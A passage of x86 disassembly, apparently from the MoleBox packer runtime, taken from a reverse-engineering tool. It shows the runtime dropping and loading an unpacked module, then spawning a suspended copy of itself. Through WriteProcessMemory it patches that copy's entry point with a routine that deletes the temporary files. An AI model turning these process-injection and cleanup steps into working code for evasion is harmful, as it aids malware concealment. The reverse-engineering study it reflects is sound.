mov ecx, [ebp+var_A4]
mov edx, [ebp+var_A0]
add edx, [ecx+eax+0Ch]
sub edx, [ebp+var_A8]
mov [ebp+var_B0], edx
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_A0]
add ecx, [eax+10h]
cmp [ebp+var_B0], ecx
jbe short loc_41A121
jmp loc_41A264
; ---------------------------------------------------------------------------
loc_41A121: ; CODE XREF: sub_419995+785�j
mov eax, [ebp+var_B0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41A133
jmp loc_41A264
; ---------------------------------------------------------------------------
loc_41A133: ; CODE XREF: sub_419995+797�j
and ds:dword_4248C8, 0
push [ebp+var_B0]
call sub_41E15D
test eax, eax
jnz loc_41A259
cmp ds:dword_4248C8, 0
jz short loc_41A15B
jmp loc_41A25B
; ---------------------------------------------------------------------------
loc_41A15B: ; CODE XREF: sub_419995+7BF�j
mov edi, [ebp+var_B0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
push [ebp+var_24]
call sub_41C9BA
pop ecx
pop ecx
mov [ebp+var_B4], eax
mov [ebp+var_4], 2
push 5Ch
push [ebp+var_B4]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jz short loc_41A1AF
mov eax, [ebp+var_B8]
inc eax
mov [ebp+var_B8], eax
jmp short loc_41A1BB
; ---------------------------------------------------------------------------
loc_41A1AF: ; CODE XREF: sub_419995+809�j
mov eax, [ebp+var_B4]
mov [ebp+var_B8], eax
loc_41A1BB: ; CODE XREF: sub_419995+818�j
mov edi, [ebp+var_B0]
mov edx, [ebp+var_B8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push [ebp+var_B4]
call sub_41E15D
test eax, eax
jnz short loc_41A232
cmp ds:dword_4248C8, 0
jz short loc_41A20B
push 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
jmp short loc_41A25B
; ---------------------------------------------------------------------------
loc_41A20B: ; CODE XREF: sub_419995+865�j
push 7Eh
call ds:dword_42470C ; RtlRestoreLastWin32Error
push 0FFFFFFFFh
and [ebp+var_134], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_134]
jmp loc_41A822
; ---------------------------------------------------------------------------
loc_41A232: ; CODE XREF: sub_419995+85C�j
mov [ebp+var_4], 1
call sub_41A240
jmp short loc_41A259
sub_419995 endp
; =============== S U B R O U T I N E =======================================
sub_41A240 proc near ; CODE XREF: sub_419995+8A4�p
; DATA XREF: _4:004214D8�o
mov eax, [ebp-0B4h]
mov [ebp-0FCh], eax
push dword ptr [ebp-0FCh]
call sub_41BACD
pop ecx
retn
sub_41A240 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419995
loc_41A259: ; CODE XREF: sub_419995+7B2�j
; sub_419995+8A9�j
jmp short loc_41A25F
; ---------------------------------------------------------------------------
loc_41A25B: ; CODE XREF: sub_419995+7C1�j
; sub_419995+874�j
mov [ebp+var_5C], 1
loc_41A25F: ; CODE XREF: sub_419995:loc_41A259�j
jmp loc_41A09C
; ---------------------------------------------------------------------------
loc_41A264: ; CODE XREF: sub_419995+72A�j
; sub_419995+746�j ...
push 8000h
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
push [ebp+var_A0]
call ds:dword_424728 ; VirtualFree
and [ebp+var_A0], 0
and [ebp+var_4], 0
jmp short loc_41A29B
; END OF FUNCTION CHUNK FOR sub_419995
; =============== S U B R O U T I N E =======================================
sub_41A28B proc near ; DATA XREF: _4:004214C8�o
push dword ptr [ebp-14h]
call sub_41C317
retn
sub_41A28B endp
; =============== S U B R O U T I N E =======================================
sub_41A294 proc near ; DATA XREF: _4:004214CC�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
sub_41A294 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_419995
loc_41A29B: ; CODE XREF: sub_419995+639�j
; sub_419995+659�j ...
mov eax, [ebp+var_8C]
cmp dword ptr [eax+8], 0
jnz short loc_41A2C9
mov eax, [ebp+var_98]
push dword ptr [eax+38h]
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
call sub_419437
pop ecx
pop ecx
mov ecx, [ebp+var_8C]
mov [ecx+8], eax
loc_41A2C9: ; CODE XREF: sub_419995+910�j
mov eax, [ebp+var_98]
push dword ptr [eax+38h]
mov eax, [ebp+var_8C]
push dword ptr [eax+8]
call sub_419437
pop ecx
pop ecx
mov ecx, [ebp+var_98]
mov ecx, [ecx+24h]
add ecx, eax
mov eax, [ebp+var_98]
mov [eax+24h], ecx
mov eax, [ebp+var_8C]
and dword ptr [eax+10h], 0
mov eax, [ebp+var_8C]
and dword ptr [eax+14h], 0
mov eax, [ebp+var_8C]
mov dword ptr [eax+24h], 0E0000080h
loc_41A317: ; CODE XREF: sub_419995+623�j
jmp loc_419E58
; ---------------------------------------------------------------------------
loc_41A31C: ; CODE XREF: sub_419995+4DE�j
and [ebp+var_9C], 0
jmp short loc_41A332
; ---------------------------------------------------------------------------
loc_41A325: ; CODE XREF: sub_419995+9AF�j
; sub_419995+9BA�j ...
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_41A332: ; CODE XREF: sub_419995+98E�j
cmp [ebp+var_9C], 10h
jnb short loc_41A375
cmp [ebp+var_9C], 0
jnz short loc_41A346
jmp short loc_41A325
; ---------------------------------------------------------------------------
loc_41A346: ; CODE XREF: sub_419995+9AD�j
cmp [ebp+var_9C], 2
jnz short loc_41A351
jmp short loc_41A325
; ---------------------------------------------------------------------------
loc_41A351: ; CODE XREF: sub_419995+9B8�j
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_98]
and dword ptr [ecx+eax*8+7Ch], 0
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_98]
and dword ptr [ecx+eax*8+78h], 0
jmp short loc_41A325
; ---------------------------------------------------------------------------
loc_41A375: ; CODE XREF: sub_419995+9A4�j
push 0Ah
pop ecx
xor eax, eax
mov edi, [ebp+var_8C]
rep stosd
mov eax, [ebp+var_34]
add eax, [ebp+var_30]
mov ecx, [ebp+var_8C]
mov [ecx+14h], eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_98]
mov ecx, [ecx+50h]
mov [eax+0Ch], ecx
mov esi, offset a_box_ ; "_BOX_"
mov edi, [ebp+var_8C]
movsd
movsw
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_98]
mov ecx, [ecx+38h]
mov [eax+8], ecx
mov eax, [ebp+var_8C]
mov dword ptr [eax+10h], 200h
mov eax, [ebp+var_8C]
mov dword ptr [eax+24h], 0E0000020h
mov eax, [ebp+var_98]
mov dword ptr [eax+3Ch], 200h
mov eax, [ebp+var_98]
mov eax, [eax+50h]
mov ecx, [ebp+var_98]
add eax, [ecx+38h]
mov ecx, [ebp+var_98]
mov [ecx+50h], eax
mov eax, [ebp+var_98]
mov eax, [eax+1Ch]
mov ecx, [ebp+var_98]
add eax, [ecx+38h]
mov ecx, [ebp+var_98]
mov [ecx+1Ch], eax
mov eax, [ebp+var_98]
mov eax, [eax+28h]
mov [ebp+var_20], eax
push 5
pop ecx
mov esi, offset loc_423C48
mov edi, [ebp+var_54]
rep movsd
movsw
movsb
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_BC], eax
mov eax, [ebp+var_BC]
mov ecx, [ebp+var_98]
mov ecx, [ecx+28h]
mov [eax+1], ecx
call sub_41922D
mov ecx, [ebp+var_BC]
mov ecx, [ecx+1]
xor ecx, eax
mov eax, [ebp+var_BC]
mov [eax+1], ecx
mov eax, [ebp+var_BC]
add eax, 5
mov [ebp+var_BC], eax
mov eax, [ebp+var_BC]
mov ecx, [ebp+var_24]
mov [eax+1], ecx
mov eax, [ebp+var_BC]
add eax, 5
mov [ebp+var_BC], eax
mov eax, [ebp+var_BC]
mov ecx, [ebp+var_3C]
mov [eax+1], ecx
mov eax, [ebp+var_BC]
add eax, 5
mov [ebp+var_BC], eax
mov eax, [ebp+var_BC]
inc eax
mov [ebp+var_BC], eax
mov eax, [ebp+var_BC]
mov dword ptr [eax+1], offset sub_419529
and [ebp+var_BC], 0
xor eax, eax
mov edi, [ebp+var_54]
add edi, 20h
stosd
stosd
stosd
mov eax, [ebp+var_54]
mov dword ptr [eax+24h], 8
mov eax, [ebp+var_98]
mov dword ptr [eax+0A4h], 8
mov eax, [ebp+var_8C]
mov eax, [eax+0Ch]
add eax, 20h
mov ecx, [ebp+var_98]
mov [ecx+0A0h], eax
mov eax, [ebp+var_98]
mov ecx, [ebp+var_8C]
mov ecx, [ecx+0Ch]
mov [eax+28h], ecx
mov eax, [ebp+var_98]
mov ax, [eax+6]
add ax, 1
mov ecx, [ebp+var_98]
mov [ecx+6], ax
mov eax, [ebp+var_98]
and dword ptr [eax+58h], 0
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+var_28]
call ds:dword_424628 ; CreateFileA
mov [ebp+var_58], eax
cmp [ebp+var_58], 0FFFFFFFFh
jnz short loc_41A573
mov ecx, 0EF000011h
call sub_41BA32
loc_41A573: ; CODE XREF: sub_419995+BD2�j
push 0
lea eax, [ebp+var_C0]
push eax
push [ebp+var_34]
push [ebp+var_1C]
push [ebp+var_58]
call ds:dword_42473C ; WriteFile
cmp [ebp+var_2C], 0
jz short loc_41A5A9
push 0
lea eax, [ebp+var_C0]
push eax
push [ebp+var_30]
push [ebp+var_2C]
push [ebp+var_58]
call ds:dword_42473C ; WriteFile
loc_41A5A9: ; CODE XREF: sub_419995+BFA�j
push 0
lea eax, [ebp+var_C0]
push eax
push 200h
push [ebp+var_54]
push [ebp+var_58]
call ds:dword_42473C ; WriteFile
push [ebp+var_58]
call ds:dword_424658 ; FlushFileBuffers
push [ebp+var_58]
call ds:dword_424624 ; CloseHandle
mov ds:dword_4248B8, 1
push [ebp+var_28]
call ds:dword_4246DC ; LoadLibraryA
mov [ebp+var_C4], eax
cmp [ebp+var_C4], 0
jnz short loc_41A61B
push 2B5h
push offset aCProjectsPTegg ; "C:\\Projects\\P\\Teggo\\MoleBox\\molebox2\\bo"...
call sub_41BEBA
pop ecx
pop ecx
push [ebp+var_28]
call ds:dword_424640 ; DeleteFileA
mov ecx, 0EF000010h
call sub_41BA32
loc_41A61B: ; CODE XREF: sub_419995+C60�j
push [ebp+var_24]
push [ebp+var_C4]
mov ecx, ds:dword_4248AC
call sub_41EC69
movzx eax, [ebp+var_5C]
test eax, eax
jz loc_41A760
mov eax, [ebp+var_C4]
mov [ebp+var_D0], eax
mov eax, [ebp+var_D0]
mov ecx, [ebp+var_D0]
add ecx, [eax+3Ch]
mov [ebp+var_E0], ecx
mov eax, [ebp+var_E0]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_E0]
lea eax, [ecx+eax+18h]
mov [ebp+var_DC], eax
mov eax, [ebp+var_E0]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_DC]
lea eax, [ecx+eax-28h]
mov [ebp+var_D4], eax
mov eax, [ebp+var_D4]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_D0]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_D8], eax
mov eax, [ebp+var_D0]
add eax, [ebp+var_D8]
mov [ebp+var_CC], eax
push 5Ch
push [ebp+var_24]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_C8], eax
cmp [ebp+var_C8], 0
jnz short loc_41A6E4
mov eax, [ebp+var_24]
mov [ebp+var_C8], eax
jmp short loc_41A6F1
; ---------------------------------------------------------------------------
loc_41A6E4: ; CODE XREF: sub_419995+D42�j
mov eax, [ebp+var_C8]
inc eax
mov [ebp+var_C8], eax
loc_41A6F1: ; CODE XREF: sub_419995+D4D�j
push 14h
call sub_41BA4A
pop ecx
mov [ebp+var_100], eax
mov eax, [ebp+var_100]
mov [ebp+var_E4], eax
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_C8]
mov [eax], ecx
mov eax, [ebp+var_E4]
mov ecx, ds:dword_4248CC
mov [eax+10h], ecx
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_E0]
mov [eax+0Ch], ecx
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_CC]
mov [eax+4], ecx
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_D0]
mov [eax+8], ecx
mov eax, [ebp+var_E4]
mov ds:dword_4248CC, eax
loc_41A760: ; CODE XREF: sub_419995+CA0�j
call sub_419903
push 0FFFFFFFFh
mov eax, [ebp+var_C4]
mov [ebp+var_138], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_138]
jmp loc_41A822
; END OF FUNCTION CHUNK FOR sub_419995
; =============== S U B R O U T I N E =======================================
sub_41A789 proc near ; DATA XREF: _4:004214C0�o
mov eax, [ebp-48h]
mov ds:dword_4248C4, eax
cmp dword ptr [ebp-3Ch], 0FFFFFFFFh
jz short loc_41A7A1
push 0
push dword ptr [ebp-3Ch]
call sub_41473F
loc_41A7A1: ; CODE XREF: sub_41A789+C�j
mov eax, [ebp-50h]
mov [ebp-104h], eax
push dword ptr [ebp-104h]
call sub_41BACD
pop ecx
mov eax, [ebp-44h]
mov [ebp-108h], eax
push dword ptr [ebp-108h]
call sub_41BACD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-10Ch], eax
push dword ptr [ebp-10Ch]
call sub_41BACD
pop ecx
mov eax, [ebp-2Ch]
mov [ebp-110h], eax
push dword ptr [ebp-110h]
call sub_41BACD
pop ecx
mov eax, [ebp-54h]
mov [ebp-114h], eax
push dword ptr [ebp-114h]
call sub_41BACD
pop ecx
mov eax, [ebp-28h]
mov [ebp-118h], eax
push dword ptr [ebp-118h]
call sub_41BACD
pop ecx
retn
sub_41A789 endp
; ---------------------------------------------------------------------------
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_419995
loc_41A822: ; CODE XREF: sub_419995+B8�j
; sub_419995+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_419995
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A831 proc near ; CODE XREF: sub_41DF18+15�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_0]
mov ecx, ds:dword_4248AC
call sub_41EB4C
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41A8AD
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
jbe short loc_41A889
mov ecx, [ebp+var_8]
inc ecx
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_41A8A8
; ---------------------------------------------------------------------------
loc_41A889: ; CODE XREF: sub_41A831+34�j
mov ecx, [ebp+arg_8]
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [eax], ecx
loc_41A8A8: ; CODE XREF: sub_41A831+56�j
push 1
pop eax
jmp short loc_41A8AF
; ---------------------------------------------------------------------------
loc_41A8AD: ; CODE XREF: sub_41A831+1C�j
xor eax, eax
loc_41A8AF: ; CODE XREF: sub_41A831+7A�j
pop edi
pop esi
leave
retn
sub_41A831 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8B3 proc near ; CODE XREF: sub_41D6FE+42�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4214E0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_78], 0
and [ebp+var_74], 0
and [ebp+var_70], 0
xor eax, eax
lea edi, [ebp+var_6C]
stosd
and [ebp+var_60], 0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp+var_5C]
rep stosd
call ds:dword_424664 ; GetCurrentProcess
mov [ebp+var_68], eax
mov [ebp+var_64], offset dword_411740
and [ebp+var_1C], 0
cmp ds:dword_4248B8, 0
jz loc_41AA14
and [ebp+var_4], 0
push 105h
call sub_41BA4A
pop ecx
mov [ebp+var_8C], eax
mov eax, [ebp+var_8C]
mov [ebp+var_78], eax
push 50h
call sub_41BA4A
pop ecx
mov [ebp+var_90], eax
mov eax, [ebp+var_90]
mov [ebp+var_74], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_78]
rep stosd
stosb
push 104h
push [ebp+var_78]
push 0
call ds:dword_424698 ; GetModuleHandleA
push eax
call ds:dword_424694 ; GetModuleFileNameA
mov [ebp+var_60], 44h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_60]
push eax
push 0
push 0
push 4
push 1
push 0
push 0
push 0
push [ebp+var_78]
call ds:dword_424638 ; CreateProcessA
test eax, eax
jnz short loc_41A9AD
mov ecx, 0EF000015h
call sub_41BA32
loc_41A9AD: ; CODE XREF: sub_41A8B3+EE�j
call ds:dword_424668 ; GetCurrentProcessId
push eax
push [ebp+var_88]
call sub_41AB84
pop ecx
pop ecx
push [ebp+var_84]
call ds:dword_421020 ; ResumeThread
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41AA14
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_94], eax
cmp [ebp+var_94], 0EF000015h
jnz short loc_41A9F8
mov [ebp+var_98], 1
jmp short loc_41AA06
; ---------------------------------------------------------------------------
loc_41A9F8: ; CODE XREF: sub_41A8B3+137�j
push [ebp+var_14]
call sub_41C317
mov [ebp+var_98], eax
loc_41AA06: ; CODE XREF: sub_41A8B3+143�j
mov eax, [ebp+var_98]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41AA14: ; CODE XREF: sub_41A8B3+66�j
; sub_41A8B3+11E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41A8B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA23 proc near ; CODE XREF: sub_41AB72+B�p
; DATA XREF: sub_41AB72+6�o ...
var_24C = byte ptr -24Ch
var_220 = byte ptr -220h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 24Ch
push edi
and [ebp+var_108], 0
push ds:dword_42489C
push 0
push 1F0FFFh
call ds:dword_4248F4
mov ds:dword_4248A8, eax
cmp ds:dword_4248A8, 0
jz short loc_41AA94
loc_41AA55: ; CODE XREF: sub_41AA23+63�j
lea eax, [ebp+var_108]
push eax
push ds:dword_4248A8
call ds:dword_4248E8
test eax, eax
jz short loc_41AA88
cmp [ebp+var_108], 103h
jnz short loc_41AA88
push 0FFFFFFFFh
push ds:dword_4248A8
call ds:dword_4248EC
jmp short loc_41AA55
; ---------------------------------------------------------------------------
loc_41AA88: ; CODE XREF: sub_41AA23+47�j
; sub_41AA23+53�j
push ds:dword_4248A8
call ds:dword_4248FC
loc_41AA94: ; CODE XREF: sub_41AA23+30�j
or [ebp+var_10C], 0FFFFFFFFh
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4248D0
lea eax, [ebp+var_104]
push eax
call ds:dword_4248D4
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4248D8
push 64h
call ds:dword_4248F8
loc_41AAEB: ; CODE XREF: sub_41AA23+124�j
lea eax, [ebp+var_24C]
push eax
push offset dword_424900
call ds:dword_4248DC
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_41AB49
lea eax, [ebp+var_220]
push eax
call ds:dword_4248E0
test eax, eax
jnz short loc_41AB3B
push 1F4h
call ds:dword_4248F8
lea eax, [ebp+var_220]
push eax
call ds:dword_4248E0
test eax, eax
jnz short loc_41AB3B
jmp short loc_41AB68
; ---------------------------------------------------------------------------
loc_41AB3B: ; CODE XREF: sub_41AA23+F8�j
; sub_41AA23+114�j
push [ebp+var_10C]
call ds:dword_4248E4
jmp short loc_41AAEB
; ---------------------------------------------------------------------------
loc_41AB49: ; CODE XREF: sub_41AA23+E7�j
; sub_41AA23:loc_41AB68�j
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_41AB5E
push [ebp+var_10C]
call ds:dword_4248E4
loc_41AB5E: ; CODE XREF: sub_41AA23+12D�j
push 0
call ds:dword_4248F0
jmp short loc_41AB6A
; ---------------------------------------------------------------------------
loc_41AB68: ; CODE XREF: sub_41AA23+116�j
jmp short loc_41AB49
; ---------------------------------------------------------------------------
loc_41AB6A: ; CODE XREF: sub_41AA23+143�j
pop edi
leave
retn
sub_41AA23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB6D proc near ; DATA XREF: sub_41AB84+2B6�o
push ebp
mov ebp, esp
pop ebp
retn
sub_41AB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB72 proc near ; DATA XREF: sub_41AB84+2EF�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset sub_41AA23
call eax ; sub_41AA23
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41AB72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB84 proc near ; CODE XREF: sub_41A8B3+107�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push 0
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_20], ecx
mov eax, [ebp+arg_4]
mov ds:dword_42489C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_42489C
push offset dword_42489C
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
push 20h
pop ecx
xor eax, eax
mov edi, offset dword_424900
rep stosd
call ds:dword_424668 ; GetCurrentProcessId
push eax
push offset aMbx@X@_ ; "MBX@%X@*.###"
push offset dword_424900
call ds:dword_424754 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 80h
push offset dword_424900
push offset dword_424900
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
mov esi, offset aKernel32_dll ; "kernel32.dll"
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
lea eax, [ebp+var_10]
push eax
push offset aGettemppatha ; "GetTempPathA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248D0, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248D0
push offset dword_4248D0
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSetcurrentdire ; "SetCurrentDirectoryA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248D4, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248D4
push offset dword_4248D4
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetcurrentdire ; "GetCurrentDirectoryA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248D8, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248D8
push offset dword_4248D8
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindfirstfilea ; "FindFirstFileA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248DC, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248DC
push offset dword_4248DC
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aDeletefilea ; "DeleteFileA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248E0, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248E0
push offset dword_4248E0
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindclose ; "FindClose"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248E4, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248E4
push offset dword_4248E4
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248E8, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248E8
push offset dword_4248E8
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aWaitforsingleo ; "WaitForSingleObject"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248EC, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248EC
push offset dword_4248EC
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aExitprocess ; "ExitProcess"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248F0, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248F0
push offset dword_4248F0
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aOpenprocess ; "OpenProcess"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248F4, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248F4
push offset dword_4248F4
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSleep ; "Sleep"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248F8, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248F8
push offset dword_4248F8
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aClosehandle ; "CloseHandle"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_4248FC, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4248FC
push offset dword_4248FC
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
mov eax, offset sub_41AB6D
sub eax, offset sub_41AA23
mov [ebp+var_1C], eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_1C]
push offset sub_41AA23
push offset sub_41AA23
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
add ecx, [eax+28h]
mov [ebp+var_18], ecx
lea eax, [ebp+var_14]
push eax
push 20h
push offset sub_41AB72
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_421024 ; WriteProcessMemory
pop edi
pop esi
leave
retn
sub_41AB84 endp
; =============== S U B R O U T I N E =======================================
sub_41AE88 proc near ; CODE XREF: _3:00412EEC�p
push esi
mov esi, ecx
call sub_41B0A1
mov eax, esi
pop esi
retn
sub_41AE88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE94 proc near ; CODE XREF: _3:0041B05F�p _3:0041B06C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, ecx
cmp byte ptr [ebx+68h], 0
jnz loc_41AF48
mov edx, [ebx+10h]
mov ecx, [ebp+arg_4]
push esi
mov eax, edx
mov esi, ecx
lea edx, [edx+ecx*8]
shr eax, 3
shl esi, 3
and eax, 3Fh
cmp edx, esi
push edi
mov [ebx+10h], edx
jnb short loc_41AEC7
inc dword ptr [ebx+14h]
loc_41AEC7: ; CODE XREF: sub_41AE94+2E�j
mov edx, ecx
push 40h
shr edx, 1Dh
add [ebx+14h], edx
pop edx
sub edx, eax
cmp ecx, edx
mov [ebp+var_4], edx
jb short loc_41AF2B
mov esi, [ebp+arg_0]
mov ecx, edx
lea edi, [eax+ebx+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebx+18h]
and ecx, 3
push eax
rep movsb
mov ecx, ebx
call sub_41B0C8
